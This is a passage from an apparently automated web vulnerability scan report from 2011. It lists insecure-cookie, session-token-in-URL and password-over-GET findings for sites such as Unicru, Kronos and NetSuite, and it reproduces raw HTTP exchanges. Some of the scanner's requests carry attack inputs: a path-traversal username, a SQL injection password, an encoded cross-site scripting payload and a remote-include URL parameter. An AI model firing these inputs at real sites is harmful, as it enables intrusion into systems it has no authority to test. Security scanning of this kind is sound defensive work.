Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 42vm
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=993264394.20736.0000; path=/


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

11.17. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asp/home/login.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: employer.unicru.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:40:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 43
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSAATCQTA=MGBECJJCAMBAEKDDNHDKHNIH; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=184615946.20736.0000; path=/


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

11.18. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 106

txtUsername=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2flog%2fapache%2ferror.log&txtPassword=3

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:50:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Location: ../../asp/home/ErrorPage.asp?ErrCode=0
Content-Length: 159
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
Set-Cookie: ASPSESSIONIDSSRADQTB=EINNMKJCGHFFJHCJOHNLPDMM; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=1211368202.20736.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../asp/home/ErrorPage.asp?ErrCode=0">here</a>.</body>

11.19. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 214

txtUsername=Smith&txtPassword=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&image1.
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:52:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Location: ../../asp/home/ErrorPage.asp?ErrCode=0
Content-Length: 159
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
Set-Cookie: ASPSESSIONIDQCDRBTRC=NNLPKKJCDHNIPJJGHAECJHGA; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=385942538.20736.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../asp/home/ErrorPage.asp?ErrCode=0">here</a>.</body>

11.20. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hmc/report/ HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:30 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d8308cb242bf2b615f7a;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4789


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...

11.21. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hmc/report/index.cfm?register=http://netsparker.com/n HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 102

email=netsparker%40example.com&j_password=3&j_passwordconfirm=3&j_username=Smith&name=Smith&storenum=3

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e307db0b53d142e16b3;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...

11.22. https://www.fusionvm.com/FusionVM/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.fusionvm.com
Path:   /FusionVM/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FusionVM/ HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: CriticalWatch_WinMgmt=a623626d-8fc7-42a5-b103-e9b75ad79594; expires=Mon, 25-Apr-2011 13:19:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=z4su31o2100elwiksplqkftw; path=/; HttpOnly
Date: Mon, 25 Apr 2011 12:54:52 GMT
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.fusionvm.com/FusionVM/DesktopDefault.aspx">here</a>.</h2>
</body></html>

11.23. https://checkout.netsuite.com/s  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

HEAD /s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: netsparker/check
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=G4QzN1GchdfPr9rBJblBVPSQ5Jt63Zmb6JGBswSzDh2vP1LYSpzFqQ8ySNfk1fymwpy48cGyMdHsh0Qm2hgLvMGK1fgWxg2xsZBXTmhKB8Q22BrCVLQTv4mvdvnrtvGT!-1220802186; NLVisitorId=rcHW8495AXQCDpzW; NLShopperId=rcHW8495AYQCDmZk; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:26:37 GMT
Server: Apache
Location: http://shopping.netsuite.com/s.nl?alias=s&c=438708&n=1
Expires: 0
NS_RTIMER_COMPOSITE: 668885514:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId=rcHW8495AYQCDmZk; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect to shopping server for shopping requests
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8


11.24. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /Default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.asp?nsextt=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000003%2529%253C%252Fscript%253E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Cookie: ICRedirect=Url=nsextt%3D%27%2522%2D%2D%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Enetsparker%280x000002%29%253C%2Fscript%253E; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=FKMMPBCAJIEPPLMFHLPCHMNK
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=nsextt%3D%252527%252522%2D%2D%25253E%25253C%25252Fstyle%25253E%25253C%25252Fscript%25253E%25253Cscript%25253Enetsparker%2525280x000003%252529%25253C%25252Fscript%25253E; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

11.25. https://customer.kronos.com/user/forgotpassword.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/forgotpassword.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/forgotpassword.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13005
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

11.26. https://customer.kronos.com/user/forgotusername.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/forgotusername.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/forgotusername.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13247
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

11.27. https://customer.kronos.com/user/logindenied.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/logindenied.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/logindenied.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/Default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16169
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

12. Session token in URL  previous  next
There are 5 instances of this issue:


12.1. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://kronos.tt.omtrdc.net
Path:   /m2/kronos/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: kronos.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 102
Date: Mon, 25 Apr 2011 13:51:37 GMT
Server: Test & Target

mboxFactories.get('default').get('Button_cta_right_rail',0).setOffer(new mboxOfferDefault()).loaded();

12.2. http://mbox5.offermatica.com/m2/netsuite/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox5.offermatica.com
Path:   /m2/netsuite/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1303736347554-914602&mboxPC=1303736347554-914602.17&mboxPage=1303742461357-40763&mboxCount=1&mbox=overall_conversion_tracking-mbox&mboxId=0&mboxURL=http%3A//www.netsuite.com/portal/page_not_found.shtml&mboxReferrer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT&mboxVersion=28 HTTP/1.1
Host: mbox5.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1278
Date: Mon, 25 Apr 2011 14:40:50 GMT
Server: Test & Target

var mboxCurrent=mboxFactoryDefault.get('overall_conversion_tracking-mbox',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-o
...[SNIP]...

12.3. http://mbox9e.offermatica.com/m2/eset/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox9e.offermatica.com
Path:   /m2/eset/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303736347554-914602&mboxPage=1303736347554-914602&mboxCount=1&mbox=mbx_store_con&mboxId=0&mboxTime=1303718347701&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fstore&mboxReferrer=http%3A%2F%2Fwww.eset.com%2Fus%2Fbusiness%2Fproducts&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 168
Date: Mon, 25 Apr 2011 12:58:56 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_store_con',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303736347554-914602.17");

12.4. http://shopping.netsuite.com/app/site/query/additemtocart.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /app/site/query/additemtocart.nl

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303736347554-914602&productId=1650 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 62

buyid=1650&Submit.x=43&Submit.y=8&c=438708&qtyadd=1&promocode=

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 12:59:54 GMT
Server: Apache
Location: /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=
Expires: 0
NS_RTIMER_COMPOSITE: 1120473518:73686F702D6A6176613030332E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=mvcnN1wK94GbYGym1LHB3yTs2BZr95jnRnSsg8T7DSWtbMRrnz2jSQhVXgBz1h5FmvJJRnm7G9v0khqbf08h4CZVwXzh2xQ10sHch9Mv5nsHgKz9z2JDTpTGpvdc67Ch!719211912; path=/
Set-Cookie: NLVisitorId=rcHW8415ATCkvpg2; domain=shopping.netsuite.com; expires=Sunday, 15-Apr-2012 12:59:56 GMT; path=/
Set-Cookie: NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8


12.5. http://shopping.netsuite.com/s.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NLPromocode=438708_; promocode=; NS_VER=2011.1.0

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 25 Apr 2011 12:59:55 GMT
Server: Apache
Location: /s.nl?c=438708&sc=3&whence=&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8
NS_RTIMER_COMPOSITE: 1229161202:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect after consuming actionable parameters
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8


13. Password field submitted using GET method  previous  next
There are 5 instances of this issue:


13.1. http://direct.yandex.ru/pages/direct/_direct-1303387947.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /pages/direct/_direct-1303387947.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /pages/direct/_direct-1303387947.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
